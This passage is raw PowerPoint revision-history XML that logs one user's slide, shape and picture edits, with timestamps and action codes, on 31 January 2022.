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98CF6-3A98-4044-98DB-5B72C9D0B64A}" v="14" dt="2022-01-31T18:59:1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TE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:28:23.407" v="2503" actId="1076"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T17:51:15.386" v="6" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2232245020" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T17:51:11.546" v="5" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2232245020" sldId="256"/>
            <ac:spMk id="2" creationId="{82BC7C26-DAB3-4389-BA6A-F024CA90D444}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T17:51:15.386" v="6" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2232245020" sldId="256"/>
            <ac:spMk id="3" creationId="{7F2FB7CC-4D68-4DA2-B016-2129AAB332B4}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:01.361" v="2493" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3856893931" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T17:57:52.626" v="334" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3856893931" sldId="257"/>
            <ac:spMk id="16" creationId="{1A69F082-F9CF-45A0-9386-636F45DF00C3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:01.361" v="2493" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3856893931" sldId="257"/>
            <ac:spMk id="21" creationId="{CECBE8ED-0CF2-4F40-A18A-D3452D811086}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T17:58:26.896" v="337" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3856893931" sldId="257"/>
            <ac:picMk id="4" creationId="{755C4A31-254D-41F2-8B33-4152C3F61BBC}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:14:37.975" v="2402" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="450671116" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:18:28.676" v="1364" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450671116" sldId="258"/>
            <ac:spMk id="2" creationId="{244F825B-0E87-4275-AF20-E2149F3943D2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:01:46.856" v="563" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450671116" sldId="258"/>
            <ac:spMk id="3" creationId="{E73BE092-56DC-48BD-B42D-2A887C3DB767}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:13:53.631" v="2391" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450671116" sldId="258"/>
            <ac:spMk id="8" creationId="{625831A7-D422-4E56-A285-138088CC7600}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:14:03.207" v="2393" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450671116" sldId="258"/>
            <ac:spMk id="9" creationId="{5152C33B-7EA1-4B33-9FAF-FC5BBDFB940F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:14:37.975" v="2402" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450671116" sldId="258"/>
            <ac:spMk id="10" creationId="{7D5E48D2-4350-45CB-BAD2-B2076C556EB4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:14:33.191" v="2400" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450671116" sldId="258"/>
            <ac:spMk id="11" creationId="{DDDD66C6-B36A-42BE-AA4E-FEC16CFFE581}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:13:53.631" v="2391" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450671116" sldId="258"/>
            <ac:spMk id="12" creationId="{8EECF46D-0906-45C0-8FED-EC5D83CAFF1A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:14:03.207" v="2393" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450671116" sldId="258"/>
            <ac:spMk id="13" creationId="{4C168447-0207-4F0B-9A19-95160DA9FFE0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:14:07.263" v="2394" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450671116" sldId="258"/>
            <ac:spMk id="14" creationId="{F079C792-67DA-497C-87C2-583A4B28E079}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:14:07.263" v="2394" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450671116" sldId="258"/>
            <ac:spMk id="15" creationId="{97D1E1D5-28B6-4E6B-8F83-35AD5D51D1A6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:14:35.647" v="2401" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450671116" sldId="258"/>
            <ac:picMk id="5" creationId="{B8A93C30-8F4B-4A3B-A960-8A486219F805}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:13:45.304" v="2390" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450671116" sldId="258"/>
            <ac:picMk id="7" creationId="{BF3BE867-8F52-4B28-8D51-595C3CE9252E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:26:41.196" v="1381" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450671116" sldId="258"/>
            <ac:picMk id="17" creationId="{5AAFF4D7-9AD3-4D91-BDA1-50A394A5C246}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:32:40.766" v="1543" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3229850188" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:26:50.056" v="1384" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3229850188" sldId="259"/>
            <ac:spMk id="2" creationId="{AD999311-75C1-404A-B41B-69E2E493E0DE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:27:22.336" v="1389" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3229850188" sldId="259"/>
            <ac:spMk id="3" creationId="{38410A47-6B3F-43CB-BC2E-84C9170D7DB7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:32:40.766" v="1543" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3229850188" sldId="259"/>
            <ac:spMk id="11" creationId="{0D304BF3-9847-410F-9E9B-814F7A370C2A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:27:23.856" v="1390" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3229850188" sldId="259"/>
            <ac:picMk id="5" creationId="{B9B7D6CA-E1C4-4B7B-AB81-0674C8E93617}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:30:34.373" v="1439" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3229850188" sldId="259"/>
            <ac:picMk id="6" creationId="{79559141-BF46-403B-B183-22EAC4AA95DB}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:29:15.824" v="1409" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3229850188" sldId="259"/>
            <ac:picMk id="8" creationId="{587912FD-39B8-4455-8C46-6D557EC141FC}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:30:36.628" v="1440" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3229850188" sldId="259"/>
            <ac:picMk id="10" creationId="{DA68847E-15F0-4342-BA60-9ECC91CFDE12}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:45:23.384" v="1707" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="334019309" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:44:30.744" v="1699" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="334019309" sldId="260"/>
            <ac:spMk id="7" creationId="{5DD85443-11A1-475D-9611-3D209CF1AA77}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:44:41.567" v="1701" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="334019309" sldId="260"/>
            <ac:spMk id="9" creationId="{BFB67C3D-A4FD-4A0D-8D87-D3CDF1EEA402}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:44:23.704" v="1698" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="334019309" sldId="260"/>
            <ac:spMk id="11" creationId="{0D304BF3-9847-410F-9E9B-814F7A370C2A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:44:49.343" v="1702" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="334019309" sldId="260"/>
            <ac:spMk id="12" creationId="{0F78CA11-58CC-4BC6-8C0E-02E566CAE443}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:44:55.592" v="1704" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="334019309" sldId="260"/>
            <ac:spMk id="15" creationId="{30E581FD-46A1-4B8B-8C51-4E52BBFCE0C5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:44:30.744" v="1699" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="334019309" sldId="260"/>
            <ac:picMk id="3" creationId="{8F038610-2EF0-46BB-BE04-C28BD1BC4EE1}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:44:38.327" v="1700" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="334019309" sldId="260"/>
            <ac:picMk id="5" creationId="{07C77DED-3839-41F9-A62F-3179DC2601D0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:31:39.016" v="1497" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="334019309" sldId="260"/>
            <ac:picMk id="6" creationId="{79559141-BF46-403B-B183-22EAC4AA95DB}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:31:39.996" v="1498" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="334019309" sldId="260"/>
            <ac:picMk id="8" creationId="{587912FD-39B8-4455-8C46-6D557EC141FC}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:31:40.936" v="1499" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="334019309" sldId="260"/>
            <ac:picMk id="10" creationId="{DA68847E-15F0-4342-BA60-9ECC91CFDE12}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:45:20.119" v="1706" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="334019309" sldId="260"/>
            <ac:picMk id="14" creationId="{9BB4713C-0DE0-477F-AB75-53DA7296D49B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:45:23.384" v="1707" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="334019309" sldId="260"/>
            <ac:picMk id="17" creationId="{EFAF83FB-39D4-43E8-B6F6-48D37A4DAF6B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod ord">
        <pc:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:08:33.175" v="2293" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1252416844" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:59:47.305" v="2283" actId="12"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1252416844" sldId="261"/>
            <ac:spMk id="6" creationId="{FB076DC0-D594-45FC-BF06-00463F9A431C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:01:07.239" v="2284" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1252416844" sldId="261"/>
            <ac:spMk id="7" creationId="{5DD85443-11A1-475D-9611-3D209CF1AA77}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:51:41.297" v="1784" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1252416844" sldId="261"/>
            <ac:spMk id="9" creationId="{BFB67C3D-A4FD-4A0D-8D87-D3CDF1EEA402}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:08:29.679" v="2292" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1252416844" sldId="261"/>
            <ac:spMk id="11" creationId="{0D304BF3-9847-410F-9E9B-814F7A370C2A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:47:43.953" v="1712" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1252416844" sldId="261"/>
            <ac:spMk id="12" creationId="{0F78CA11-58CC-4BC6-8C0E-02E566CAE443}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:47:45.274" v="1713" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1252416844" sldId="261"/>
            <ac:spMk id="15" creationId="{30E581FD-46A1-4B8B-8C51-4E52BBFCE0C5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:51:29.634" v="1780" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1252416844" sldId="261"/>
            <ac:picMk id="3" creationId="{8F038610-2EF0-46BB-BE04-C28BD1BC4EE1}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:01:15.911" v="2286" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1252416844" sldId="261"/>
            <ac:picMk id="4" creationId="{C0EFC799-AD2E-4352-9748-D75524F2D5FA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:47:42.631" v="1711" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1252416844" sldId="261"/>
            <ac:picMk id="5" creationId="{07C77DED-3839-41F9-A62F-3179DC2601D0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:47:42.175" v="1710" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1252416844" sldId="261"/>
            <ac:picMk id="14" creationId="{9BB4713C-0DE0-477F-AB75-53DA7296D49B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T18:47:41.608" v="1709" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1252416844" sldId="261"/>
            <ac:picMk id="17" creationId="{EFAF83FB-39D4-43E8-B6F6-48D37A4DAF6B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:08:52.664" v="2306" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="77341815" sldId="262"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:08:52.664" v="2306" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="77341815" sldId="262"/>
            <ac:spMk id="6" creationId="{FB076DC0-D594-45FC-BF06-00463F9A431C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:08:22.248" v="2291" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="77341815" sldId="262"/>
            <ac:spMk id="11" creationId="{0D304BF3-9847-410F-9E9B-814F7A370C2A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
